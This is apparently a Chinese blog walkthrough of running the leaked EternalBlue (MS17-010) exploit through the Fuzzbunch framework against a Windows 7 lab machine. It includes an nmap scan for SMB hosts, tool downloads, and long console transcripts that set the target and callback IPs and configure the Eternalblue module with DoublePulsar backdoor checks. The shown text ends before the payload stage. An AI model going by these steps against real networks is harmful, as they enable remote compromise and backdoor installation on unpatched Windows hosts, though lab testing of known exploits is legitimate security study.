最近那个WannaCry勒索病毒搞的沸沸扬扬,据了解该病毒利用了方程式泄露的0day MS17-010(永恒之蓝)进行传播。
据说这个漏洞是支持winxp-win2012,测试一下这个漏洞到底如何。
一、环境:
靶机:win7 IP:192.168.4.247
攻击机:win2003 IP:192.168.4.16
反弹shell: kali IP:192.168.4.15
在攻击机中需要python2.6环境和安装pywin32
python-2.6.6.msi
https://www.python.org/download/releases/2.6.6/
pywin32-221.win-amd64-py2.6.exe
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/
二、配置攻击机
先可以用nmap扫一下内网里开放445端口和操作系统信息
nmap -p 445 -O 192.168.4.0/24
---------------------------------------------------------------
下载工具之后解压,然后在工具里面的windows目录建一个listeningposts
打开cmd工具的windows目录,运行fb.py
--[ Version 3.5.1
[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => D:\DSZOPSDISK\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => D:\logs
[*] Autorun ON
ImplantConfig Autorun List
==========================
0) prompt confirm
1) execute
Exploit Autorun List
====================
0) apply
1) touch all
2) prompt confirm
3) execute
Special Autorun List
====================
0) apply
1) touch all
2) prompt confirm
3) execute
Payload Autorun List
====================
0) apply
1) prompt confirm
2) execute
[+] Set FbStorage => E:\shadowbroker-master\shadowbroker-master\windows\storage
[*] Retargetting Session
[?] Default Target IP Address [] : 192.168.4.247
[?] Default Callback IP Address [] : 192.168.4.16
[?] Use Redirection [yes] : no
[?] Base Log directory [D:\logs] : no
[*] Checking E:\shadowbroker-master\shadowbroker-master\windows\no for projects
Index Project
----- -------
0 test
1 test2
2 test3
3 test4
4 test5
5 Create a New Project
[?] Project [0] : 5
[?] New Project Name : test6
[?] Set target log directory to 'E:\shadowbroker-master\shadowbroker-master\wind
ows\no\test6\z192.168.4.247'? [Yes] :
[*] Initializing Global State
[+] Set TargetIp => 192.168.4.247
[+] Set CallbackIp => 192.168.4.16
[!] Redirection OFF
[+] Set LogDir => E:\shadowbroker-master\shadowbroker-master\windows\no\test6\z1
92.168.4.247
[+] Set Project => test6
fb >
--------------------------------------------
在这里我们使用Eternalblue(ms17-010 永恒之蓝)
fb > use Eternalblue
[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.4.247
[*] Applying Session Parameters
[*] Running Exploit Touches
[!] Enter Prompt Mode :: Eternalblue
Module: Eternalblue
===================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.4.247
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
Target WIN72K8R2
[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 f
or no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [192.168.4.247] :
[*] TargetPort :: Port used by the SMB service for exploit connection
[?] TargetPort [445] :
[*] VerifyTarget :: Validate the SMB string from target against the target sele
cted before exploitation.
[?] VerifyTarget [True] :
[*] VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor befor
e throwing. This option must be enabled for multiple exploit attempts.
[?] VerifyBackdoor [True] :